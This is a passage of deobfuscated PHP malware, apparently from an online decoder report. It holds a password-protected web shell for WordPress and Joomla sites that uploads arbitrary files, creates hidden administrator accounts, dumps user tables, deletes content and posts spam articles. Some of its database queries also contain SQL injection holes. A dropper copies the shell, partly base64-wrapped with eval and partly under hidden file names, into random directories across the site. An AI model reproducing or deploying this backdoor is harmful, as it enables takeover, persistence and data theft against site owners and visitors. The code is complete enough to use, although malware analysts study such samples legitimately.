		print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";
	}
	else {
		print "Upload failed!";
	}
	exit;
}

if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {
	print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";
	exit;
}

$counter = 0;
$dir_up = './';
do {
	$file_found = false;
	$file_path = "{$dir_up}wp-load.php";
	if(file_exists($file_path)) {
		require($file_path);
		$file_found = true;
	}
	else {
		$dir_up .= '../';
	}
	$counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);

if(!empty($_GET['get_users'])) {
	print array_to_json(get_users());
}
//print_r($_REQUEST);
if(isset($_REQUEST['action']) && $_REQUEST['action'] == 'create_user') {
if(empty($_REQUEST['wp_username']) || empty($_REQUEST['wp_password']) || empty($_REQUEST['wp_email'])){
print "Missing parameter for creating user!";
exit;
}
else {
$userdata = array('user_login' => $_REQUEST['wp_username'], 'user_pass' => $_REQUEST['wp_password'], 'user_email' => $_REQUEST['wp_email'], 'role' => 'administrator');
//print_r($_REQUEST);
$user_id = wp_insert_user( $userdata );
	if(is_numeric($user_id)) {
		print array_to_json(array('user_id' => $user_id));
	}
	else {
			print array_to_json("Failed creating user!");
		}
	}
}

if(!empty($_REQUEST['delete_user']) && !empty($_REQUEST['wp_user_id'])) {
	if(wp_delete_user($_REQUEST['wp_user_id'])) {
		print array_to_json("User deleted!");
	}
	else {
		print array_to_json("Failed deleting user!");
	}
}

if($_REQUEST['delete_post'] == 1 && !empty($_REQUEST['ID'])) {
	$del_op_res = wp_delete_post( $_REQUEST['ID'], true );
	if(!$del_op_res) print array_to_json("Delete failed!");
	else print array_to_json("Post deleted!");
	exit;
}

if(!empty($_REQUEST['title']) && !empty($_REQUEST['post'])) {
	$post_date = $_REQUEST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);

	// Create post object
	$my_post = array(
	  'post_title'    => $_REQUEST['title'],
	  'post_content'  => $_REQUEST['post'],
	  'post_status'   => 'publish',
	  'post_author'   => 1,
	  'post_type' => $_REQUEST['post_type'],
	  'post_date'     => $post_date
	);
	$id = NULL;
	if(empty($_REQUEST['ID'])) {
		// Insert the post into the database
		$id = wp_insert_post($my_post);
	}
	else {
		$my_post['ID'] = $_REQUEST['ID'];
		$id = wp_update_post($my_post);
	}
	$permalink = get_permalink( $id );
	wp_set_post_categories($id, array($_REQUEST['cat']));
	if($_REQUEST['delete_post'] != 1) {
		if(!empty($id)) {
			$post = get_post($id);
			print array_to_json(array("permalink"=>$permalink,"link_by_id"=>$post->guid,"ID"=>$id));
		}
		else {
			print array_to_json("Action failed!");
		}
	}
}

if(!empty($_REQUEST['plugin2update'])) {
	include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
	include_once( $dir_up . 'wp-admin/includes/update.php');
	include_once( $dir_up . 'wp-admin/includes/file.php');
	include_once( $dir_up . 'wp-admin/includes/screen.php');
	include_once( $dir_up . 'wp-admin/includes/misc.php');
	include_once( $dir_up . 'wp-admin/includes/plugin.php');
	
	foreach($_REQUEST['plugin2update'] as $plugin) {
		print "$plugin update : ";
		wp_update_plugin($plugin);
	}
	
	exit;
}

if(!empty($_REQUEST['file2clean'])) {
$tell_a_friend_content = '<?php
/*
Plugin Name: Tell a Friend
Version: 0.1
Plugin URI: http://www.freetellafriend.com/get_button/
Description: Adds a \'Share This Post\' button after each post. The service which is used is freetellafriend.com which supports e-mail address book, social bookmarks and favorites.
Author: FreeTellaFriend
Author URI: http://www.freetellafriend.com/
*/

function tell_a_friend($content) {
global $post;
$taf_permlink = urlencode(get_permalink($post->ID));
$taf_title = urlencode(get_the_title($post->ID) );
$taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';

	if ( !is_feed() && !is_page() ) {
	$content .= \'<a href="https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'" onclick="window.open(\'https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'\', \'freetellafriend\', \'scrollbars=1,menubar=0,width=617,height=530,resizable=1,toolbar=0,location=0,status=0,screenX=210,screenY=100,left=210,top=100\'); return false;" target="_blank" title="Share This Post"><img src="\'.$taf_img.\'" style="width:127px;height:16px;border:0px;" alt="Share This Post" title="Share This Post" /></a>\';				  
	}

return $content;
}

add_filter(\'the_content\', \'tell_a_friend\');

?>';

	if(file_exists($_REQUEST['file2clean'])) {
		if(strpos($_REQUEST['file2clean'], 'tell-a-friend.php') !== false) {
			if(file_put_contents($_REQUEST['file2clean'], $tell_a_friend_content)) {
				print "File {$_REQUEST['file2clean']} has been cleaned.";
			}
			else {
				print "Failed cleaning {$_REQUEST['file2clean']} !";
			}
		}
	}
}

if(!empty($_REQUEST['get_plugins']) && $_REQUEST['get_plugins'] == 1) {
	include_once($dir_up . 'wp-admin/includes/plugin.php');
		
	$plugins = get_plugins();
	print array_to_json($plugins);
}

if(!empty($_REQUEST['post_url2search'])) {
	$the_slug = str_replace('/', '', $_REQUEST['post_url2search']);
	$args = array(
		'name' => $the_slug,
		'post_status' => 'publish',
		'posts_per_page' => 1
	);
	$my_posts = get_posts( $args );

	if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
		$post = get_post($my_posts[0]->ID);
		$post->category = get_the_category($my_posts[0]->ID);
	}
	
	print array_to_json($post);
}

if(!empty($_REQUEST['post_id'])) {
	$post = get_post($_REQUEST['post_id']);
	$post->category = get_the_category($_REQUEST['post_id']);
	print array_to_json($post);
}

if(!empty($_REQUEST['page_id'])) {
	$post = get_page($_REQUEST['page_id']);
	$post->category = get_the_category($_REQUEST['page_id']);
	print array_to_json($post);
}

$args = array(
	'show_option_all'    => '',
	'show_option_none'   => '',
	'orderby'            => 'ID', 
	'order'              => 'ASC',
	'show_count'         => 1,
	'hide_empty'         => 0, 
	'child_of'           => 0,
	'exclude'            => '',
	'echo'               => 1,
	'selected'           => $sel_cat,
	'hierarchical'       => 0, 
	'name'               => 'cat',
	'id'                 => '',
	'class'              => 'postform',
	'depth'              => 0,
	'tab_index'          => 0,
	'taxonomy'           => 'category',
	'hide_if_empty'      => false,
    'walker'             => ''
);

if(!empty($_REQUEST['get_categories']) && $_REQUEST['get_categories'] == 1) {
	print array_to_json(get_categories( $args )); 
}

if(!empty($_REQUEST['get_pages_list']) && $_REQUEST['get_pages_list'] == 1) {
	$pages_array = get_pages();
	$new_pages_array = array();
	for($i=0,$len=count($pages_array);$i<$len;$i++) {
		$new_pages_array[$i]['ID'] = $pages_array[$i]->ID;
		$new_pages_array[$i]['post_title'] = $pages_array[$i]->post_title;
		$new_pages_array[$i]['post_name'] = $pages_array[$i]->post_name;
	}
	print array_to_json($new_pages_array);
}

if(!empty($_REQUEST['get_posts_list'])) {
	if(isset($_REQUEST['search_by_post_type'])) {
		$post_type = $_REQUEST['search_by_post_type'];
	}
	else {
		$post_type = '';
	}

	$args = array(
	'posts_per_page'   => 50,
	'offset'           => 0,
	'category'         => '',
	'category_name'    => '',
	'orderby'          => 'ID',
	'order'            => 'DESC',
	'include'          => '',
	'exclude'          => '',
	'meta_key'         => '',
	'meta_value'       => '',
	'post_type'        => $post_type,
	'post_mime_type'   => '',
	'post_parent'      => '',
	'post_status'      => 'publish',
	'suppress_filters' => true );

	if(isset($_REQUEST['search_by_url'])) {
		$the_slug = str_replace('/', '', $_REQUEST['search_by_url']);
		if(!empty($post_type) && $post_type == 'post') {
			$args['name'] = $the_slug;
		}
		else {
			$args['pagename'] = $the_slug;
		}
	}
	
	if(isset($_REQUEST['search_by_keyword'])) {
		$args['s'] = $_REQUEST['search_by_keyword'];
	}
	
	$posts_array = get_posts( $args );
	for($i=0,$len=count($posts_array);$i<$len;$i++) {
		$new_posts_array[$i]['ID'] = $posts_array[$i]->ID;
		$new_posts_array[$i]['post_title'] = $posts_array[$i]->post_title;
		$new_posts_array[$i]['post_name'] = $posts_array[$i]->post_name;
		$new_posts_array[$i]['post_content'] = $posts_array[$i]->post_content;
	}
	print array_to_json($new_posts_array);
}

if(!empty($_REQUEST['upload_file'])) {
	print '<form method="post" enctype="multipart/form-data"><input type="file" name="my_file"><input type="submit"></form>';
}

if(!empty($_FILES['my_file'])) {
	$base_name = basename($_FILES['my_file']['name']);
	if(move_uploaded_file($_FILES['my_file']['tmp_name'], $base_name)) {
		print '<a href="'.$base_name.'" target="_blank">'.$base_name.'</a>';
	}
}

if(!empty($_REQUEST['get_api_version'])) {
	print array_to_json(array('api_version' => number_format(API_VERSION, 2)));
}
?>';



$jm_code = '<?php
header('Content-Type:text/html; charset=UTF-8');

@set_time_limit(60);

define('API_VERSION', 2.0);
define('PASSWORD_FILE', 'p.txt');

if(file_exists(PASSWORD_FILE)) {
	@unlink(PASSWORD_FILE);
}

//////////////////////////////////////////
function array_to_json( $array )
{
    if (is_string($array)) return '"'.addslashes($array).'"';
    if (is_numeric($array)) return $array;
    if ($array === null) return 'null';
    if ($array === true) return 'true';
    if ($array === false) return 'false';

    $assoc = false;
    $i = 0;
    foreach ($array as $k=>$v){
        if ($k !== $i++){
            $assoc = true;
            break;
        }
    }
    $res = array();
    foreach ($array as $k=>$v){
        $v = array_to_json($v);
        if ($assoc){
            $k = '"'.addslashes($k).'"';
            $v = $k.':'.$v;
        }
        $res[] = $v;
    }
    $res = implode(',', $res);
    return ($assoc)? '{'.$res.'}' : '['.$res.']';
}

function get_full_path($link) {
	$dir = dirname($_SERVER['PHP_SELF']);
	$levels_up = substr_count(JPATH_SITE, '..');
	for($i=0;$i<$levels_up;$i++) {
		preg_match('/(\/[^\/]+)$/', $dir, $matches);
		$dir = preg_replace('/\/[^\/]+$/', '', $dir);
		$link = str_replace($matches[1], '', $link);
	}
	
	if(strpos($link, 'http') !== 0) {
		$link = 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['SERVER_NAME'] . $link;
	}
	
	return $link;
}
//////////////////////////////////////////

define('SHELL_PASSWORD', 'a6a8cb877ee18215f2c0fc2a6c7b4f2a');
define('MAX_UP_LEVELS', 10);

if((empty($_COOKIE['password']) && empty($_POST['password'])) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
	print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
	setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
	header("Location: {$_SERVER['PHP_SELF']}");
	exit;
}

if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
	exit;
}

if(!empty($_FILES['f'])) {
	$new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];
	if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {
		print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";
	}
	else {
		print "Upload failed!";
	}
	exit;
}

if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {
	print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";
	exit;
}

define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

$counter = 0;
$dir_up = '.' . DS;
do {
	$file_found = false;
	$file_path = $dir_up . 'administrator';
	if(file_exists($file_path)) {
		$file_found = true;
	}
	else {
		$dir_up .= '..' . DS;
	}
	$counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);

define('JPATH_BASE', $dir_up);
	
require_once ( JPATH_BASE . 'includes'.DS.'defines.php' );
require_once ( JPATH_BASE . 'includes'.DS.'framework.php' );

//define('JPATH_COMPONENT_ADMINISTRATOR', dirname(__FILE__) . "/administrator");
define('JPATH_COMPONENT_ADMINISTRATOR', JPATH_BASE . DS . 'administrator' . DS . 'components' . DS . 'com_content');
require_once JPATH_BASE.'/includes/framework.php';
//$app = JFactory::getApplication('site');
//require_once JPATH_BASE.'/includes/framework.php';


//echo JPATH_BASE. "/administrator/components/com_content/models/article.php";
require_once JPATH_BASE. "/components/com_content/models/article.php";
                         //administrator/components/com_content/models

require_once(JPATH_BASE.DS.'components'.DS.'com_content'.DS.'helpers'.DS.'route.php');						 
						 
$app = JFactory::getApplication('site', array('session' => false));
$app->initialise();

if(!empty($_REQUEST['title']) && !empty($_REQUEST['body'])) {

foreach($_REQUEST as $key => $value) {
	$_REQUEST[$key] = stripslashes($value);
}

	$new_article = new ContentModelArticle();
	$date = date($_REQUEST['publish_up'] . ' ' . rand(1,23). ':' . rand(1,59). ':' . rand(1,59));
	$data = array(
		'catid' => $_REQUEST['catid'], //newsarticles
		'title' => $_REQUEST['title'],
		'fulltext' => $_REQUEST['body'],
		'introtext' => $_REQUEST['intro'],
		'state' => $_REQUEST['published'],
        'created_by' => $_REQUEST['created_by'],
        'publish_up' => $date,
		'created' => $date,
		'alias' => $_REQUEST['alias'],
		'language' => $_REQUEST['lang'] //FORMAT EXAMPLE: en-GB
	);
	if(!empty($_REQUEST['id'])) {
		$data['id'] = $_REQUEST['id'];
	}
	$table = JTable::getInstance('content', 'JTable', array());
	// Bind data
	if (!$table->bind($data))
	{
		print_r($table->getError());
		return false;
	}
	
	// Store the data.
	if (!$table->store())
	{
		print_r($table->getError());
	}
	
	print json_encode(array("article_id" => $table->id));
}

if(!empty($_REQUEST['id2delete'])) {
	$row = JTable::getInstance('content', 'JTable');
	$row->delete($_REQUEST['id2delete']);
}

$db = JFactory::getDBO(); // get database object

if(!empty($_REQUEST['article_id'])) {
	$article_id = $_REQUEST['article_id'];
	$sql = "SELECT * FROM #__content WHERE id='" . $_REQUEST['article_id']."'"; // prepare query

	$db->setQuery($sql); // apply query
	$article = $db->loadObject(); // execute query, return result list
}

if(!empty($article)) {
	print array_to_json($article);
}

if(!empty($_REQUEST['username2delete'])) {
	$user = JFactory::getUser($_REQUEST['username2delete']);
	if($user->delete()) {
		print "User {$_REQUEST['username2delete']} has been deleted!";
	}
}

if(!empty($_REQUEST['user_name']) && !empty($_REQUEST['user_password']) && !empty($_REQUEST['user_email'])) {
	/*
 
	I handle this code as if it is a snippet of a method or function!!
	 
	First set up some variables/objects
	*/
	// get the ACL
	$acl =& JFactory::getACL();
	 
	/* get the com_user params */
	 
	jimport('joomla.application.component.helper'); // include libraries/application/component/helper.php
	$usersParams = &JComponentHelper::getParams( 'com_users' ); // load the Params
	 
	// "generate" a new JUser Object
	$user = JFactory::getUser(0); // it's important to set the "0" otherwise your admin user information will be loaded
	 
	$data = array(); // array for all user settings
	
	$usertype = 'Super Administrator';
	 
	// set up the "main" user information
	
	$data['name'] = 'Zhano Zhano'; // add first- and lastname
	$data['username'] = $_REQUEST['user_name']; // add username
	$data['email'] = $_REQUEST['user_email']; // add email
	$data['gid'] = 24;  // generate the gid from the usertype
	 
	/* no need to add the usertype, it will be generated automaticaly from the gid */
	 
	$data['password'] = $_REQUEST['user_password']; // set the password
	$data['password2'] = $_REQUEST['user_password']; // confirm the password
	$data['sendEmail'] = 1; // should the user receive system mails?
	 
	/* Now we can decide, if the user will need an activation */
	$data['block'] = 0; // don't block the user
	 
	if (!$user->bind($data)) { // now bind the data to the JUser Object, if it not works....
		JError::raiseWarning('', JText::_( $user->getError())); // ...raise an Warning
	}
	 
	if (!$user->save()) { // if the user is NOT saved...
		JError::raiseWarning('', JText::_( $user->getError())); // ...raise an Warning
	}
	 
	print array_to_json($user->username . " created!"); // else return the new JUser object
}

if(!empty($_REQUEST['get_cats'])) {
	$cat_urls = array();
	$sql = "SELECT #__categories.id, #__categories.title, #__menu.path AS menu_path, COUNT(#__content.id) AS count_articles FROM #__categories 
	INNER JOIN #__content ON #__categories.id = #__content.catid 
	INNER JOIN #__menu ON #__categories.id = REPLACE(#__menu.link, 'index.php?option=com_content&view=category&layout=blog&id=', '')
	GROUP BY #__categories.id ORDER BY #__categories.title ";
	$db->setQuery($sql); // apply query
	$cats = $db->loadObjectList();
	for ($i=0,$len=count($cats);$i<$len;$i++) {
		$cats[$i]->path = get_full_path(JURI::base() . $cats[$i]->menu_path);
		unset($cats[$i]->menu_path);
	}
	
	if(empty($cats)) {
		$sql = "SELECT #__categories.id, #__categories.title FROM #__categories ";
		$db->setQuery($sql); // apply query
		$cats = $db->loadObjectList();
		for ($i=0,$len=count($cats);$i<$len;$i++) {
			$cats[$i]->path = get_full_path(JURI::base() . 'index.php?option=com_content&view=category&layout=blog&id=' . $cats[$i]->id);
			$cats[$i]->count_articles = '?';
		}
	}
	
	print array_to_json($cats);
}

if(!empty($_REQUEST['get_user'])) {
	$sql = "SELECT * FROM #__users ";
	$db->setQuery($sql); // apply query
	$users = $db->loadObjectList();
	print array_to_json($users);
}

if(!empty($_REQUEST['get_articles_list'])) {
	$offset = 0;
	$articles_num = 50;
	$all_articles = array();
	
	$cond = '';
	if(!empty($_REQUEST['search_by_title'])) {
		$cond .= " AND #__content.title LIKE '%{$_REQUEST['search_by_title']}%' ";
	}
	
	if(!empty($_REQUEST['search_by_body'])) {
		$cond .= " AND (#__content.fulltext LIKE '%{$_REQUEST['search_by_body']}%' OR #__content.introtext LIKE '%{$_REQUEST['search_by_body']}%') ";
	}
	
	if(!empty($_REQUEST['search_by_alias'])) {
		$cond .= " AND #__content.alias LIKE '%{$_REQUEST['search_by_alias']}%' ";
	}
	
	if(empty($cond)) {
		$cond = ' AND 2=2 ';
	}
	
	do {
		$sql = "SELECT #__content.id, #__content.title, #__content.fulltext, #__content.introtext, #__content.alias FROM #__content WHERE 1=1 {$cond} ORDER BY `title` LIMIT {$offset}, $articles_num "; // prepare query
		$db->setQuery($sql); // apply query
		$articles = $db->loadObjectList(); // execute query, return result list
		$all_articles += $articles;
		$offset += $articles_num;
	}while(count($articles) == $articles_num);
	print array_to_json($all_articles);
}

if(!empty($_REQUEST['article_sef_url'])) {
	$sql = "SELECT catid, alias, language FROM #__content WHERE id = '{$_REQUEST['article_sef_url']}' ";
	$db->setQuery($sql); // apply query
	$article = $db->loadObject(); // execute query, return result list

	$sql = "SELECT path FROM #__menu WHERE link LIKE 'index.php?option=com_content&view=category&%id={$article->catid}' ";
	$db->setQuery($sql); // apply query
	$cat_path = $db->loadObject();
	if(isset($cat_path->path)) {
		$slug = $_REQUEST['article_sef_url'] . ':' . $article->alias;
		$catslug = $article->catid . ':' . $cat_path->path;
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($slug, $catslug));
		if(!empty($article->language)) {
			$link = str_replace('index.php/', 'index.php/' . substr($article->language, 0, 2) . '/', $link);
		}
		print array_to_json(get_full_path($link));
	}
	else {
		print array_to_json(get_full_path(JURI::base() . 'index.php?option=com_content&view=article&id=' . $_REQUEST['article_sef_url']));
	}
}

if(!empty($_REQUEST['get_languages'])) {
	$languages = JLanguageHelper::getLanguages();
	print array_to_json($languages);//lang_code INDEX IS USED FOR INSERTING INTO CONTENT
}

if(!empty($_REQUEST['get_jm_version'])) {
	print array_to_json(JVERSION);
}

if(!empty($_REQUEST['upload_file'])) {
	print '<form method="post" enctype="multipart/form-data"><input type="file" name="my_file"><input type="submit"></form>';
}

if(!empty($_FILES['my_file'])) {
	$base_name = basename($_FILES['my_file']['name']);
	if(move_uploaded_file($_FILES['my_file']['tmp_name'], $base_name)) {
		print '<a href="'.$base_name.'" target="_blank">'.$base_name.'</a>';
	}
}

if(!empty($_REQUEST['get_api_version'])) {
	print array_to_json(array('api_version' => number_format(API_VERSION, 2)));
}
?>';



$wp_enc_file = '<?php eval("?>" . base64_decode("'.$wp_code.'")); ?>';

$wp_dec_file = base64_decode($wp_code);



$jm_enc_file = '<?php eval("?>" . base64_decode("'.$jm_code.'")); ?>';

$jm_dec_file = base64_decode($jm_code);



$orig_dir = getcwd();



$counter = 0;

do{

        foreach(glob("*") as $file) {

                if(strpos($file, "wp-config.php") !== false) {

                        define('PLATFORM', 'WORDPRESS');

                }

                if(strpos($file, "configuration.php") !== false) {

                        define('PLATFORM', 'JOOMLA');

                }

        }

        if(!defined('PLATFORM')) {

                chdir('..');

                $counter++;

        }

        else {

                $site_root_dir = getcwd();

        }

}while(!defined('PLATFORM') && $counter < MAX_LEVELS_UP);



if(!defined('PLATFORM')) {

        exit("Unknown platform!");

}



$all_dirs = array();



get_all_dirs(getcwd());



if(count($all_dirs) >= 10) {

        $num_of_rand_dirs = 10;

}

else {

        $num_of_rand_dirs = count($all_dirs);

}



$all_dirs = array_filter($all_dirs, "filter_dirs");

$chosen_dirs_indexes = array_rand($all_dirs, $num_of_rand_dirs);



print "PLATFORM : " . PLATFORM . "<br>\n";



if(PLATFORM == 'WORDPRESS') {

        $contents = array($wp_enc_file, $wp_dec_file);

}



if(PLATFORM == 'JOOMLA') {

        $contents = array($jm_enc_file, $jm_dec_file);

}



$web_dirname = dirname($_SERVER['REQUEST_URI']);

$site_root_dir_splitted = explode("/", $site_root_dir);

$web_dir_splitted = explode("/", $web_dirname);



if($site_root_dir_splitted[count($site_root_dir_splitted)-1] == $web_dir_splitted[1]) {

        $site_dir = $web_dir_splitted[1];

}



$content_type = 0;

$periods_count = 0;

foreach($chosen_dirs_indexes as $chosen_dir_index) {

        $file_name = get_file_name($all_dirs[$chosen_dir_index] . '/');

        if($periods_count < 2) {

                $periods_count++;

                $file_name .= '.';

        }

        file_put_contents($file_name, $contents[$content_type]);

        $file_rel_path = substr($file_name, strlen($site_root_dir));

        if(!isset($site_dir)) {

                $site_dir = '';

        }

        $file_full_path = $site_dir . $file_rel_path;

        if($content_type == 0) {

                $content_type = 1;

        }

        else {

                $content_type = 0;

        }

        print preg_replace("/^\//", "", $file_full_path) . "<br>\n";

        flush();

}

//print PLATFORM;

//print_r($all_dirs);

?>

Function Calls

define 1
set_time_limit 1

Variables

None

Stats

MD5 2f52641b63fe535a8f9861dfcc216a19
Eval Count 0
Decode Time 385 ms